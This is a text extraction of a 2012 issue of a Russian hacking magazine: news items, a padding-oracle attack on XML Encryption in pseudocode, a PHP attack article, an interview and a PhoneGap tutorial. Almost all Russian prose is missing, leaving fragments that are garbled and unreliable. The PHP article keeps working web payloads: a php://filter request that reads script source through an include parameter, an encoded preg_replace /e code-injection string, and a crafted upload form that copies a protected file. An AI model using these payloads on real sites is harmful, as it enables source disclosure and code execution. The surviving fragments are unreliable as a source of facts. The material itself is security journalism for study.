x 01 (156) 2012

WWW.XAKEP.RU



Lotus Domino Controller

ANDROID

: 230 .

XML ENCRYPTION: XML-

XML

ENCRYPTION
XML-
.
,

024

PHP
036

PHONEGAP:

HTML5
064

018

156

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

Intro

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

MALWARE SYN/ACK
UNIXOID

PR-
xakep.ru

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


: . : .

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906


:
, . , :
100%. ,
250 ,
. ? , , :
,
. .
. :
1-3 ,
. ,
: ,
. ,
.
, ,
, .
, .
, : .
,
, , .
:
115 !
shop.glc.ru/xakep.
, ,
. :
!
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag


.: (495) 935-7034, : (495) 545-0906


TECHNOLOGY

(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)

(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2012


Content

004

HEADER
004
011

MEGANEWS

hacker tweets
-



SIRI

016
017


8 Dropbox AdWords
Proof-of-concept
XSS- 100

COVERSTORY

030

,
Adobe

COVERSTORY

COVERSTORY

018

024

XML
Encryption

XML



PHP

112

122

PCZONE
036
042

046

PhoneGap: HTML5

Windows-

Windows-

Windows-?

UNIXOID
102
107
112
117

050
054
060
064
068
072

Easy-Hack



MD5


- SpyEye
Lotus,
Lotus Domino Controller
X-Tools

SYN/ACK
118

122

NAS
5- 6- NAS-

Silicon
Power SP060GBSSDV30S25

PHREAKING

MALWARE
080
084


Win32/Duqu: Stuxnet
: bootkit test
BitDefender, ESET NOD32, F-Secure, Outpost Security,
Rising

126

132

094

098

.NET-

.NET Framework

,


-

Loop
,

136
139
142

088

FERRUM
130

074


Linux
!
tcpdump

Android-
- Ubuntu 11.10
Oneiric Ocelot

144

FAQ UNITED
FAQ

8.5
WWW2
web-
2012
NY2k+12

MEGANEWS
SIRI

UBUNTU


SIRI

iPhone 4S

Applidium Siri,
iOS 5. ,
. ,

Siri
. -,
Android, Siri iPad.
Applidium: applidium.com/en/news/cracking_siri.
:
iPhone 4S
,
Speex. Siri

iPhone 4S.
\,
. ,
,
, , .
. iPhone

Apple. ,
.


Applidium

,

Siri.
,

,

Siri.

WINDOWS XP
.


,
.


APPLE
. ,

,
.



! comScore,

50,81
.

UBUNTU

(
Canonical, Debian,
,
Ubuntu) , Ubuntu
, .
Canonical ,
, Windows 8, , ARM-.
, . ,

. ,
Ubuntu 14.04, 2014 . ,
,
.
Canonical
Ubuntu 12.04,
2012 . , LTS-
( ),
,
.


(CHRONOPAY)
,
DDOS- (Assist),
.

, STEAM .

, ,

Steam.


MEGANEWS FACEBOOK , 600 .

POLAROID !

DNS

,


, DNS-.
, ,

.
DNS-
Hotmail, Gmail, Google, Microsoft
, Uol, Terra Globo. , , , google.com,
IP- Google,
-. . ,
Google
Google Defender, .
, ,
27- ,
DNS-
, DNS-.
, ,
Ghost Click.

- ,
DNS Changer. Mac OS
X Windows DNS.
IP- 15
! , , .

100 , 500
.

( ), 14 ,
. - ( - )
,
.
, , DNS-
Internet Systems Consortium.
,
Rove Digital. , .
, .
,
, .
EstDomains , , .
ICANN
2008, ,
.
. 22
.
85 .

2008
Polaroid ,

11-
.

,


Polaroid
, 11-


.

Polaroid
: Z340
Instant Digital Camera. ZINK
Zero Ink Printing,
. ,
, .
,
. , ,
,
. 14 .
2,7"
SD.
( 43 ) F/3,2.
( 1280 720 ). Polaroid Z340
76 102 , $20 30
. - ,
, , 25 .

, Polaroid. Z340 Instant Digital Camera $300.

AVIRA

AESCRIPT.DLL

MEGANEWS

, THE CONSUMERIST, RIAA .

!
, WI-FI,

MYBB


MyBB.
,
MyBB 1.6.4.
. ,
PHP, .
,
,
.
, ,
,
.
, CMS,
, .
, MyBB 1.6.4,
6 ,
. ,
.

.
,
.
(CDN).

, , ,
. , ,
. -, ,
10 ,

/GPS. ,
, , , , 802.11.
-,
. , ,
,
( 100 ), 802.11, .
, .
, ,
.
, - ,
.
. , - ,
.

iPhone 4S,
,

,
.
Apple
- :).

WEXLER.BOOK E7001. Wexler


WEXLER.BOOK E7001 7.0" ,
. 4
( 32
microSD) ,
, ;
FM-. - 1500 mAh, ,
.
, . WEXLER.BOOK E7001
.
: 5 990 .


,
GOOGLE! , Microsoft.
Bing

Firefox.

38
Interfilm.ru
Puzkarapuz.ru.


13 .


MEGANEWS

ENTENSYS COMMTOUCH , 6,7% .




,

.
YouTube :
Anonymous
(Zetas)
. , ,
, ,
. , 26 2011
- . ,
- .
-.
Anonymous ,
,
. ,
,
, -
, ,
. , OpCartel (
). , , ,
,
. , ,
,
OpCartel .
.
.
, , , , .


.
.onion Hidden Wiki,
. ,
. -
,
Freedom Hosting. ...
: Freedom Hosting,
40 ,

Lolita City , 100 .


Freedom Hosting,
,
. Operation Darknet
DDoS-.
, Lolita City
SQL-.
, , ,
.
:
pastebin.com/T1LHnzEW.


Anonymous . ,
,
- 20006000
.

38
.

IT .

,


(@asintsov)

#hacker tweets
@EdiStrosar:



,
(
).

@ILLUMlNATI:

@RuCTFE:

,

.

#RuCTFE
0ldEur0pe RWTH, ,
.
t.co/lUlI94Ko.

:
@WeldPond:
@jkouns:



. Google-
.

Google,

OllyDbg IDA Pro
_noRE.exe .
:

@mikko:

IP-: http://49.2;
http://96.4; http://71.3;
http://96.99.
...

-. :)
, Google
Wi-Fi,
_nomap. :)

@insit0r:

0day BIND.
@Rogunix:

DoS/PoC- ICMP refCount


TCP/IP (MS11-083) 2^32
UDP-, , 250 52 .
t.co/QYPCMyRy.


Microsoft/MSRC.
!
Google. ++.


DNS- BIND,
DoS 0day.

Shodan ,
Siemens Simatic.
t.co/L1QDb3cq.
:

. SCADA
. SCADA- .

EMET,
, , . !


@Stephenwest:

How to do a pentest:
1. Draw line with pen.
2. Check line.
3. If visible, pen works.
4. If no line, pen does not work.
:

- .
pentest?
1. (pen) .
2. .
3. , , .
4. , , .

@WeldPond:
@fjserna:

CTF .

@csoghoian:

Chrome silentlyInstall()
. , FBI .
t.co/5EhY8AUC.

@jduck1337:

: bash: ./:
.

@j00ru:
@mikko:


,
: .
#worstpassword


Windows (NT/2000/
XP/2003/Vista/2008/7/8).
: t.co/oBHiB76O.
:


, . ? :)


( 926 ), ,
.

MEGANEWS



Nitro,
,



.

.

Stuxnet, , - ,
, .
, ,
Symantec. ,
Nitro,
,
. 29 19 ,
(,
). ,
.
, .
( Poison Ivy).
, .
Symantec ,
. Nitro :
, .



.
,
.


SUP
.
,

.

GOOGLE,
Android,
18,7%,

Opera Mini,
13,1%.

,
!
. , , .
, ? ,
, . ,
.
VideoGhost,
.
,
, (
- 2 ). VideoGhost
,
USB-. USB- -, .
USB-,
VideoGhost.
VGA, DVI HDMI,
$200.

FACEBOOK.
Trusted Friends

.



XXX.
ICANN

.


MAIL.RU GROUP , Twitter. , .

BITCOIN

PC ANDROID'


,
BITCOIN
BitCoin
.
,
, . ,
Mt Gox, BitCoin,
, . , BitCoin
, ,
,
.
Intego,
,
DevilRobber, BitCoin.
.
,
, ,
, ,
BitCoin, ,
.
DevilRobber Mac OS X,
.
The Pirate Bay . ,
Graphic Converter Mac OS X.
,
. , DevilRobber
BitCoin-, .
Mac. DevilRobber ,
Safari Vidalia
Firefox, TOR.
, DevilRobber , ,
.
BitCoin
.
Microsoft , . ,

BitCoin.
: 1
2, , 50 , 1 .

, , .
,
, ,
BitCoin. - .
, .
, .

, .
, BitCoin, :
, ,
- .

FXI ,
The Cotton
Candy
$200,


2012 .
, Windows 8
.

FXI . The Cotton Candy


( ,
21 , , ).
USB-, . ARM- Samsung Exynos 1,2 (
, Samsung Galaxy S II), Mali-400 MP, microSD ( 64 ),
Wi-Fi Bluetooth, HDMI 2.1 USB 2.0. ,
1080p. The Cotton Candy
Android 2.3.
, , ,
Android. .
HDMI, USB (
). Bluetooth ,
.
Android Market,
.

, GOOGLE ?

SSID
_NOMAP,

GOOGLE

MEGANEWS

LINUX 3.1, kernel.org .

ADOBE
FLEX
FLASH

,

,
, !
, , .
, , , . iSpy 100%.
, ,

iPhone Android
(magnified keys). iSpy
, ,
- !
,
.
,
60 .
90 % . ,
. , ,
.
DSLR-
12 . iSpy magnified key -
.


Adobe Flash
750 ( 7
% )

.

Adobe
Flash Player. Flash
, Adobe AIR
. Android PlayBook,
. Flash Player

HTML5.
, Flash. , ,
Apple, , - Flash Player iOS.
, Flash Player Apple iOS , . Adobe Flash
Apple.
,
Flex SDK. Flex 4.6 SDK, 29 , open source.

.
DARPA
Shredder Challenge


. , .
50 .


AMAZON
.
, 2012
.

GOOGLE


42 47
.


500 Wikimedia.

IPHONE

iPhone Dev-Team


iPhone 4S.

,


.

,
,
.

iPhone 4S ,

. Chronic Dev Team iPhone
. , , ,
iPhone,
AT&T, .
, , ,
, iPhone 4S, iPhone
: iPhone 4 iPhone 3GS, . ,
,
. , ,
. : SIM-
AT&T, ,
, . AT&T
( , ,
, ).
, youtu.be/gofpelTXI5U. :
AT&T (611)
;
;
SIM- AT&T T-Mobile;
, Wi-Fi (
,
);
,
iPhone ;
;
EDGE
E;
2030 ;
iPhone,
;

,
;
SIM-,
;
SIM- T-Mobile
.

. , iPhone T-Mobile,
.

MCAFEE:


75


HEADER

Proof-of-Concept
XSS-
100

, PoC.
, SQL-,
, ,
. , , sqlmap, SQLi
. PoC ,
XSS- . .
Damn Small XSS Scanner (DSXS).

XSS
. Cross-site scripting (XSS)
, JS-.

.
XSS- .
- , ,
,
HTTP-.
.
,
XSS-.

XSS- .
,
-
.

HTML-
GET/POST-.
(
),
.
,
,
XSS-. ,
-
. ,
. ,

HTML- <script>..</script> (
),
JavaScript-. ,
,
HTML- <a href="...">,

> JS-, <script>...</script>.

DSXS
XSS
zero.webappsecurity.com


, XSS . ? Python,

GET- POST- XSS-,


. Damn Small XSS
Scanner (DSXS) ,
-, .

, ,
. ,
,

<a href="...">, ,
> -
. DSXS
,
. , DSXS ,
.
,
.
(
,
),

. ,

. , ,
User-Agent, Referer
Cookie HTTP-. GitHub (https://github.com/stamparm/DSXS).


HEADER


10 DROPBOX
ADWORDS
10 2
Dropbox , , ][,
.
2 ,
50 ,
. $99,00 . ,
,

250 . ,
10 , ,
- . , , Dropbox,
MAC-. , ,
(, bit.ly/und69i). ,
, Dropbox - , , . ,
,
10 , Dropbox
. AdWords !

?
,
(bit.ly/rxNKyB).
,
Dropbox-.
, .
? , ,
. . ,
AdWords,
.
? . ,
! , Google, 1000 .
. . bit.ly/rAEsg1 $75
AdWords, , . :) , e-mail (
- ), (
- about.me), .
e-mail. ( ).

.
( ):
1. .
2. (, Dropbox).
3. ,
(, , ,
, ).
3. : , 600
.
. ,
.
: dropbox, free online storage,
online backup free, online backup, online backup data, dropbox space.
, ,
Google. URL ,
Dropbox Referall Status (,
http://db.tt/UfxuF8m). , .
, , .
,
. ,
CPC (Cost-Per-Click). , .
, ,
. :)
? -,
Dropbox. -, .
-, AdWords, , , (
Google). . :) z

?
? , ,
Google AdWords (adwords.google.com).
.
( ,
, ),


250 Dropbox


000, 00spersky Lab


|plaintext| (first@plaintext.su, www.plaintext.su)

COVERSTORY

XML
Encryption

XML-


BEAST Padding Oracle Attack
.NET Framework,

XML
Encryption,
XML-.


CBC

.

WWW
www.w3.org/TR/xmlenc-core/

XML Encryption

W3C.
bit.ly/qMupEv

,

XML
Encryption.

XML ENCRYPTION
XML Encryption, W3C 2002
, XML
Framework ( .NET, Apache Axis2,
JBOSS . .).
- , Microsoft Red Hat.
XML Encryption ,
XML- , ,
XML-
. , .
, AES 3DES CBC. AES (
, CBC).


XML Encryption

,
( 16 , 128 )
. ,
, CBC.
.

(IV),
XOR,
.
,

:
// Encryption
C[0] = AES_ENC(k, IV xor M[0]);
C[i] = AES_ENC(k, C[i-1] xor M[i]);
// Decryption
M[0] = AES_DEC(k, C[0]) xor IV;
M[i] = AES_DEC(k, C[i]) xor C[i-1];

k , , , IV
().
CBC,
.
, , :

,
. ,
, 12
0x05. ( 16 ),
, 15
, 16- 0x10.


, XML Encryption.

CBC ( )


, BEAST Padding
Oracle Attack.
. .
CBC ,
,
XOR IV
MSK, (IV xor MSK, C[0]) M[0] xor MSK. ,
.
,
MSK,

,
. ,
.
,
, . XML Encryption
, .
, , , ASCII. ASCII .
, NULL ( ),
( B). , , B,
. ,
,
. ,
, 16 ,
true, M[0] = AES_DEC_CBC(k, (IV, C[0])) NULL, false
.
, , .
:
1. IV1, (IV1, C[0]) .
nIV, (nIV, C[0]). true,
IV1 = nIV, false .


COVERSTORY

WS-SECURITY
WS-Security
SOAP,
-. WS-Security XML Encryption XML
Signature.

,
23 , , ,
.
2.
(, AES_DEC ,
). :
msk = 0
repeat
    msk++
    IV2 = IV1 xor (0...0||msk||0...0)
    // msk sits in the j-th byte
until Server((IV2, C[0])) == true
return X[j] = ASCIICode(NULL) xor IV2[j]
// ""

,

3. X[0] ,
M[0].
XOR X[0]
IV.
. .

XML XML ENCRYPTION

:
Input:
C=(IV1, C[0]), j
Output:
j- X[j]
X = AES_DEC(k, C[0])

. j-
, ,
j-
. , ? : CBC.
(
):
AES_DEC_CBC(k, (IV2, C[0])) = IV2 xor AES_DEC(k, C[0]) =
IV2 xor X[0].

Extensible Markup Language ( XML)


.
XML , < >
(node).
, , XML &lt; &gt; . & escape- &amp;.
XML XML Encryption.
W3C XML Signature W3C
XML Encryption, XML
(
, . .) XML.
XML Encryption,
. ,
,
( , , . .).
<CipherValue>, , , .
.
<EncryptedData>.
, ,
. <CipherValue> .

XML Encryption


XML Encryption

,
<EncryptionMethod>.
,
XML-.
, XML-, . ? :-)
XML Encryption XML- ( XML),
.
Type <EncryptedData>. Encrypted Element , XML-
. Encrypted Content ,

, , . . Encrypted Text Content,
Encrypted Content,
,
. , Type . ,
XML Framework .
. XML Encryption UTF-8,
,
.
UTF-8 , ,
(line feed)
(carriage return). ,
ASCII UTF-8.
, ASCII
128 ( 4). ,
,
.

AXIS2
-
-.
Apache Axis2 Framework,
Rampart WS-Security.
XML Encryption XML
Signature SOAP.
Axis2
Framework, (message flow). (message flow)
,
SOAP- ( ),
. SOAP-
, Message
Receiver, , ,
Service .
Axis2
: Transport, Security Dispatch. Security,

XML SIGNATURE
XML Signature W3C,

XML.


?
Provable Security,

. ,
,
,
. . ,
(, , -,
, .).
-,
,
, . Axis2,
, -.
Padding Oracle Attack,
(-, ASP.NET),
.net.

, .

,
XML SOAP-.
Dispatch. Message
Receiver, message flow
SOAP ,
.
,
Axis2. :-)

AXIS2
-,
Axis2. ,
,
true false .
security fault. security fault
:
1.
. , ,
,
? ,
0x01 0x10,
.
2.
.
,
ASCII 0x00 0x1F ( 0x09,
0x0A, 0x0D , ).
XML- , &
(0x26) < >.


.
,
ASCII (
). A
XML & <,
B .


COVERSTORY
. ,
, , , CBC, 16-
, true
false. , SOAP, . ,
true, SOAP(AES_ENC_CBC(k, (IV, C)))
security fault, false .
, security fault,
, M XML-:
PAD(M) == (IV xor AES_DEC(k, C))

:
1. M, XML- <a>,
</a>.
2. M &,
escape-,
&gt.
3. M B.
security fault, ,
.


, , . .
C=(IV, C[1], ... , C[d]),
.
, CBC
[i] C[i-1].
,
ASCII ( UTF-8). ,
,
,
B ,
0x01 (
).

-
-
.
W3C web-service ,
machine-to-machine-.

-
.
WSDL (Web Services Description Language), XML. -
,
RPC (Remote procedure calls,

), SOA (Service-oriented architecture,
) REST (Representational state transfer).
GET, POST, PUT, DELETE . .
HTTP, .


Message flow Apache Axis2


. (FindIV)
. = (IV, C[1], ... , C[d])
i,
C=(iv, C[i]).
, .
(FindXbyte) (
FindIV) j- X[i][j] X[i] = AES_DEC(k, C[i]). ,
.
Input: C=(C[0] = IV, C[1], ..., C[d])
Output: M=(M[1], ..., M[d])
for i = 1 to d do
    iv = FindIV(C, i)
    for j = 1 to 16
        X[i][j] = FindXbyte(C[i], iv, j)
    end for
    X[i] = (X[i][1], ..., X[i][16])
    M[i] = X[i] xor C[i-1]
end for
return (M[1], ..., M[d])

.
, M
CBC ( ,
). : FindIV FindXbyte.

FINDIV FINDXBYTE
FindIV , , ,
- . , .
, , ,
, , : <
IV,
0x01.
,
FindXbyte. , - , , ,

.
, , .


XML Encryption

ASCII


, .
( ,
)
( ). , , XML Schem
(XML-) . , ,
, , ,

. ,
,
.
( ),
.


,
,
XML Signature.
, XML Signature
Wrapping, , / MAC. ,
.


. -,
-, -,
.
-, , . ,
, ,
CBC, ,
(, ISO/IEC
19772:2009),
XML Encryption. , ,
OSI (, XML Encryption SSL/TLS,
BEAST).


,
, ,
, epic fail.
, XML Encryption
, side-channel,
. ,
, -
, .
Juraj Somorovsky Tibor Jager,
, . z


COVERSTORY

Pr0xor (php.m4sql@gmail.com, rdot.org/forum)

INFO

$_FILES
,

.




PHP
PHP

.
fopen, copy, file_get_contents . .

,
,

.

WWW
bit.ly/sfDcys

LightningTemplate.
bit.ly/tTtvWV

LightningTemplate.
bit.ly/mdrdqf
,

File path
injection.
pastebin.com/1edSuSVN

File path
injection.


,
,
PHP 4.3
. PHP ( , . .) .
.
PHP ,
, .
,
:
print_r(stream_get_filters());

, . stream_filter_append/

bit.ly/g6ztD3
,


$_FILES.

DVD





.

phpBB3


stream_filter_prepend php://filter.

, ,
.
:

if($closing) {
$consumed += strlen($this->_data);
$str = nl2br($this->_data);
$this->bucket->data = $str;
$this->bucket->datalen = strlen($this->_data);

$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
fwrite($fp, "I \v Love \v PHP.\n");

,
POST, Base64 :
readfile("php://filter/read=convert.base64-encode/resource=php://input");

, PHP
, . , ftp-,
gz-, :
copy('compress.zlib://ftp://user:pass@ftphost.com:21/path/file.dat.gz', '/local/copy/of/file.dat');

php://filter
-. ,
include ($_POST['inc']);

allow_url_include = Off RFI.


PHP-
POST-:
inc=php://filter/read%3Dconvert.base64-encode/resource%3D/path/script.php

, PHP -
. !


, , ,
. -
. , nl2br. . ,
filter (
).
, .
$this->_data:
private $_data;
.........................
while($bucket = stream_bucket_make_writeable($in)) {
$this->_data .= $bucket->data;
$this->bucket = $bucket;
$consumed = 0;
}

, $closing
TRUE. :


Lightning Template


COVERSTORY
if(!empty($this->bucket->data))
stream_bucket_append($out, $this->bucket);
return PSFS_PASS_ON;
}

,
PSFS_PASS_ON. ,
. .
:
stream_filter_register('convert.nl2br_string', 'nl2br_filter');

, .


, , , .
Google Code Search.
stream_filter_register.

Lightning-Template (
), . ,
sample.html:
<html><head>
<meta charset="utf-8" />
<title>{{ title }}</title>
</head> </html>

include ("./LightningTemplate.php");
$lt = new LightningTemplate('./sample.html');
$lt->title = 'My Title';
echo $lt;

HTML-:
<html><head>
<meta charset="utf-8" />
<title>My Title</title>
</head></html>

,
HTML-. ,

include,
.
,
PHP-,
. ,
,
HTML-. :
public function filter($in, $out, &$consumed, $closing) {
    while ($bucket = stream_bucket_make_writeable($in)) {
        $patterns = array(
            ...
            '/\{%\s+if\s+(.+?)\s+%\}/e',
            ...
        );
        $replacements = array(
            ...
            "'<?php if ('. \$this->condition($1). '): ?>'",
            ...
        );
        $bucket->data = preg_replace($patterns, $replacements, $bucket->data);

, "'<?php if,
. ,
. , ,
preg_replace
e. ,
:
{% if print_r(ini_get_all()) %}

PHP-. ,
, . , :
include ("./MYLightningTemplate.php");
$f = $_POST["file"];
readfile ($f);

, .
POST- file:
file=php://filter/read%3dconvert.lightning_template_filter/resource%3ddata://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2FsbCgpKSAlfQ


,
, , ,


-----------------2421143106617



php_user_filter.
: filter, onCreate, onClose.
filter, :

1. $in , ,
, .
2. $out , ,
.
3. $consumed , ,
, .
4. $closing , ,
TRUE, .
filter
:

1. PSFS_PASS_ON
.
2. PSFS_FEED_ME ,
$out .
3. PSFS_ERR_FATAL (default) .
onCreate/onClose ,
. (,
), onCreate,
. onCreate FALSE
TRUE . onClose
( ).
,
stream_filter_register.

. , ,
PHP.

FILE UPLOAD
move_uploaded_file, copy.
, , . .
, -. ,
, ,
.
,
HTML-, :
<form action=upload.php method=post
enctype=multipart/form-data>
<input type=file name=uploadfile>
<input type=submit value=Upload>
</form>


Upload, POST, Content-Type
:
Content-Type: multipart/form-data; boundary=


POST- :
-----------------------------2421143106617
Content-Disposition: form-data; name="uploadfile"; filename="hello.txt"
Content-Type: text/plain

<?php echo 'Hello!!!'; ?>


-----------------------------2421143106617--

,
hello.txt, <?php echo 'Hello!!!'; ?>.
PHP- ,
PHP
phpseUm44, hello.txt.
,
( PHP
).
$_FILES :
Array (
[uploadfile] => Array (
[name] => hello.txt
[type] => text/plain
[tmp_name] => /tmp/phpseUm44
[error] => 0
[size] => 33
)
)

, $_FILES[uploadfile][type]
Content-Type, .
, -,
PHP, :
$_FILES["file"]["type"] == "image/gif"

,
,
.
getimagesize(). , ,
, EXIF-
, .
,
. , -
pic.php.myext PHP-.
,
,
.
PHP, $_FILES.


, ,
.
bugs.php.net ,
, - .
:) ,
/ ,
$_FILES[uploadfile]
[name]. , , -. Unix-


COVERSTORY
-
. Windows- .
.
. $_FILES.
Qwazar rdot.org.
BlackFan, , ,
.
. , ,
copy:

<form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="Hidden" name="MAX_FILE_SIZE" value="10000000">
<input type="file" name="file[tmp_name][">
<input type="file" name="file[size][">
<input type="file" name="file[name][">
<input type="submit" value="submit">
</form>

$_FILES :
foreach ($_FILES["file"]["tmp_name"] as $key => $name)
{
    echo "Size:".$_FILES["file"]["size"][$key]."<br/>\r\n";
    echo "tmp name:".$_FILES["file"]["tmp_name"][$key]."<br/>\r\n";
    if($_FILES["file"]["size"][$key]>0 && $_FILES["file"]["size"][$key]<1024)
    {
        echo "Ok<br/>\r\n";
        copy($_FILES["file"]["tmp_name"][$key],'test.txt');
    }
}

$_FILES["file"]["tmp_name"]["[name"]

copy :
$_FILES["file"]["tmp_name"][$key]

, !
:

,
$_FILES ( ,
copy). , .

( upload.php), HTML-, secret.php, , upload.php,

:
1. secret.php,
(, , <?php ?>).
2. , 1.
1.
,
:
$_FILES["file"]["size"][$key]>0


file[tmp_name][ secret.php,
1. ,
test.txt.
secret.php, txt,
, .
, ,
Content-Type (, ).
,
test.txt. !


,
move_uploaded_file copy.

. (, , , ) imagecreatefrom*/image*.
, , ,
. ,
$img = imagecreatefromjpeg($_FILES["filename"]["tmp_name"]);
imagejpeg($img, "uploads/".$_FILES["filename"]["name"]);

onCreate


JPEG,
EXIF- .
, -
. , ,


. ,
,
.
, imagecreatefrom* , , !
, ,
, . ,
base64_encode ,
, , :
$jpegimage = imagecreatefromjpeg(
"data://image/jpeg;base64," . base64_encode(
$sql_result_array['imagedata']));
imagejpeg($jpegimage);

,
, .
,
,
. , ,
.
, -,
, , copy,
imagecreatefrom*/image*, :


2009 PHP ,
.
, GPC-
(), . [ ( ).
PHP
. , HTML:
<form action=>
<input name="goodvar .[">
<input name="goodarray[foo]">
<input name="badvar[ . [">
<input type=submit>
</form>
index.php :
<?php
print_r($_GET);
?>
:

Array
(
    [goodvar___] =>
    [goodarray] => Array
        (
            [foo] =>
        )
    [badvar_____] =>

foreach ($_FILES["file"]["tmp_name"] as $key => $name) {
    echo "Size:".$_FILES["file"]["size"][$key]."<br/>\r\n";
    echo "tmp name:".$_FILES["file"]["tmp_name"][$key]."<br/>\r\n";
    $img = imagecreatefromjpeg($_FILES["file"]["tmp_name"][$key]);
    imagejpeg($img, './new_'.$key.'.jpg');
    ImageDestroy($img);
}

1.jpg c ,
, ,
POST- Content-Type:

php://filter/read%3dconvert.lightning_template_filter/resource%3ddata://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2FsbCgpKSAlfQ

Array
(
[goodvar___] =>
[goodarray] => Array
(
[foo] =>
)
[badvar_ . [] =>
)

, ! , ,
, imagecreatefromjpeg. ,
,
.

, .
$_FILES,
.

PHP



PHP.

, .
, - ,
, , . z


COVER STORY

ADOBE

.

.


Elcomsoft.
Advanced eBook Processor,

1
- 200 Defcon.



,
IT, , ?

(
. . . ][), , 6.
100 . . 20
.

. ,
- ... , ,
- ,
.
.

. ,
- , . ,
, - ...
,
.
, , .
4,5 ,
6 .
91- .
, , .
,
. , .

E

COVER STORY
, ,

. , , , :
.
, ,

, .
,
, ,
, .


,
,
.
.
, .
, ,
( 97- )
. ,
,
,
IT. .
, ,
, 80 %.

Elcomsoft, .
, , ,
, . :
, .

.
,
... .

ELCOMSOFT
?

,
A .
password recovery, ,
. , ,
.
.
, .
, EFS
Recovery.
,
Active directory.
computer
forensics. ,
,
,
.

,
,
,

. ,
,

.
APPLE
,
,
? ADOBE
.

, ,
computer forensics.
, ,
. , ... Apple
,
. , ,
.

PDF
ELCOMSOFT ?

, pdf .

. : , ,
.

. ,
.


ADVANCED EBOOK
PROCESSOR, -
2001 DEFCON?

, . ,
,

pdf-, .
2001 .
,


,
. ,
, .
.
Defcon.
, ,
12 20 .
,
, ,
Adobe.
.
Defcon,
Advanced eBook Processor,
. ,
, ,
.


.
, Defcon 2001
, .

, .
.
, .
, . , ,
,
, .

.

, ,
ELCOMSOFT.

.

Access, . ,
... .
, ,
. -
,



. :)

, ,
.
-
, ,
. 90-

- ,
.
Elcomsoft, .

.

, .
, , , ...
A ,
Apple, iOS ( ,
iPhone 4S iPad2).
, .
, ,

? :)


. ,
.
, .
, , ,
,
, .
- .
,
? ?

.
,
,
21 .
,
.
,
. 11
-,
, .
,
.
, ,
, ... ,
. :) ,

, -.
,
. , ,
.
.
, ... , .

, ... ,
A
, .
Spot the fed ( ).

(, ),

,
, -
.
,
, ,
- , .
. ,
, , ,
, .
, .
Q
,
,
.


, ,
. ,
,
. ,
, , .
.
.

-.
. , ,
.
: ,
.
-, 11 . .
,
,
, ,
, , .
.
, , . :
, . ,
, .

,
ADOBE
?

, , -,
Adobe .
,
Adobe, . Adobe
, , . , : ,
, , . ,
.

, ,
?

, ,
Elcomsoft. ,


.
. .
, ,
.
.


COVER STORY
, .
,
, , , ,

. ,
. ,

.

, ( -)
50
, Elcomsoft.
, ,
, .
, .
,
.
,
, . .
,
, -
, .

. ,
2001 ,
6 , 2002
. ,
( ),
:
, ,
,
.
deposition
( )
. ,
: -
?.
, :
.
, Elcomsoft
.
. 2001
,
.

, ,
2002.
?

Elcomsoft
A ,
Public
Interest Parole. ,
, 17
Elcomsoft
.
. ,
,
. .

Q

? ,
, ADOBE
- ?
.
DMCA.

, .
, -
,
.
, .
,
,
.

-
, ?
?

,

. .

.

,

.
?

, ...
. , .
, , -
,
.


, .
, ,
...
, , ,
. ,
,
,
.
9 .

CONFIDENCE 2.0

CANON.
?

,
(Canon).
, Canon 300D, ,
, Canon 350D.
, Canon
, ,
, , . Canon 30D,

.
, .

Canon. ,
Magic Lantern,
Canon
,
.
Canon Hackers Developers Kit,
,
.
,
Canon ,
,
.
CONFidence 2.0. Nikon
. (usb-)
.
, , . ,

. Nikon
.
510
,
,
?

,
, Practical
cryptography
. , ,
, . ... ,
, .
,
. , .
, , .


?
,
?

, .
,
.
,
.
,
.
, . ,
, , ,
.
,
1 % ,
. ,
. ,
, IT,
- : .
,
.
, ,
,
. z


Preview

30 .
.

68

,



:

.
.
.
,
Lotus Domino
Controller
.
, ,
IBM
.

PC ZONE

36

HTML5
Android iOS,
? .

30 .

74


500 ,
.
.


46

?
,

, .

64

?
.
,
.

MALWARE

80

DUQU

,
Stuxnet.

84

BOOTKIT!
, MBR, ,
5 .


PC ZONE

(http://twitter.com/azproduction)

PhoneGap:

HTML5




,
,
.

todo list Android
iOS, ,
.
Objective-C Java

,
, PhoneGap.

,
Windows 8, , , ,
HTML5. , , ,
, .
,
HTML, JavaScript
CSS!, PhoneGap.
: iOS, Android,
Windows Phone, Blackberry, WebOS, Symbian Bada.

(, Objective-C iOS), API
. , , HTML5
PhoneGap API.
HTML-, , ! API

,
: , , (
), , , ( ), . . ,
- .
jQuery Mobile Sencha,
,
( ).
,
, .
.

iOS


iOS -,
AppStore,
:). : , , , , Android. ,
,


PhoneGap: HTML5


, jQuery Mobile.
JS-
(
) . ,
,
! jQuery Mobile
(jquerymobile.com/download)
, :
images/ (
jq-mobile);
index.css;
index.html;
index.js;
jquery.js;
jquery.mobile.min.css;
jquery.mobile.min.js.
, .
index.html. , .

, . iOS .

.
,
, : , . AppStore
, , . ,
. ,
.
, ,
. : -, , PhoneGap iOS.

, .
JS- jQuery c jQuery Mobile (jquerymobile.com),
Google Maps v3.
: .
.
, ( ). ,
. API.

,
. , . localStorage.



<div data-role="page" data-dom-cache="true" class="page-map" id="index">
    <div data-role="header">
        <h1></h1>
